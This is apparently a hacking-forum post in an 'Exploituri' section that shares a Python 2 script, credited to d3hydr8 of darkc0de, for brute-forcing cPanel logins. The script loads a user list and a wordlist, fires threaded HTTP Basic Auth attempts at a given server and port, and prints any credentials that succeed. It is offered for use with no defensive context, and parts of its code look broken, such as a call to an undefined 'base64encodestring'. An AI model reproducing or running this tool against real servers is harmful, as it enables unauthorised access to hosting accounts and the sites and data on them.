Jump to content
MAVNE

cPanel Brute Forcer

By MAVNE, in Exploituri

Recommended Posts

MAVNE Newbie

MAVNE

Posted
Posted

#!usr/bin/python

#cPanel BruteForcer

#http://www.darkc0de.com

#d3hydr8[at]gmail[dot]com

import threading, time, random, sys, urllib2, httplib, base64

from copy import copy

def title():

print "\n\t d3hydr8[at]gmail[dot]com cPanel BruteForcer v1.0"

print "\t-----------------------------------------------------\n"

def timer():

now = time.localtime(time.time())

return time.asctime(now)

if len(sys.argv) !=5:

title()

print "\nUsage: ./cPanelbrute.py <server> <port> <userlist> <wordlist>\n"

print "ex: python cPanelbrute.py example.com 2082 users.txt wordlist.txt\n"

sys.exit(1)

try:

users = open(sys.argv[3], "r").readlines()

except(IOError):

print "Error: Check your userlist path\n"

sys.exit(1)

try:

words = open(sys.argv[4], "r").readlines()

except(IOError):

print "Error: Check your wordlist path\n"

sys.exit(1)

wordlist = copy(words)

def reloader():

for word in wordlist:

words.append(word)

def getword():

lock = threading.Lock()

lock.acquire()

if len(words) != 0:

value = random.sample(words, 1)

words.remove(value[0])

else:

print "\nReloading Wordlist - Changing User\n"

reloader()

value = random.sample(words, 1)

users.remove(users[0])

lock.release()

if len(users) ==1:

return users[0], value[0][:-1]

else:

return users[0][:-1], value[0][:-1]

def getauth(url):

req = urllib2.Request(url)

try:

handle = urllib2.urlopen(req)

except IOError, e:

pass

else:

print "This page isn't protected by basic authentication.\n"

sys.exit(1)

if not hasattr(e, 'code') or e.code != 401:

print "\nThis page isn't protected by basic authentication."

print 'But we failed for another reason.\n'

sys.exit(1)

authline = e.headers.get('www-authenticate', '')

if not authline:

print '\nA 401 error without a basic authentication response header - very weird.\n'

sys.exit(1)

else:

return authline

class Worker(threading.Thread):

def run(self):

username, password = getword()

try:

print "-"*12

print "User:",username,"Password:",password

auth_handler = urllib2.HTTPBasicAuthHandler()

auth_handler.add_password("cPanel", server, base64encodestring(username)[:-1], base64encodestring(password)[:-1])

opener = urllib2.build_opener(auth_handler)

urllib2.install_opener(opener)

urllib2.urlopen(server)

print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n"

except (urllib2.HTTPError, httplib.BadStatusLine), msg:

#print "An error occurred:", msg

pass

title()

if sys.argv[1][-1] == "/":

sys.argv[1] = sys.argv[1][:-1]

server = sys.argv[1]+":2082"

if sys.argv[2].isdigit() == False:

print "[-] Port must be a number\n"

sys.exit(1)

else:

port = sys.argv[2]

if sys.argv[1][-1] == "/":

sys.argv[1] = sys.argv[1][:-1]

server = sys.argv[1]+":"+port

print "[+] Server:",server

print "[+] Port:",port

print "[+] Users Loaded:",len(users)

print "[+] Words Loaded:",len(words)

print "[+]",getauth(server)

print "[+] Started",timer(),"\n"

for i in range(len(words)*len(users)):

work = Worker()

work.setDaemon(1)

work.start()

time.sleep(1)

print "\n[-] Done -",timer(),"\n"

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...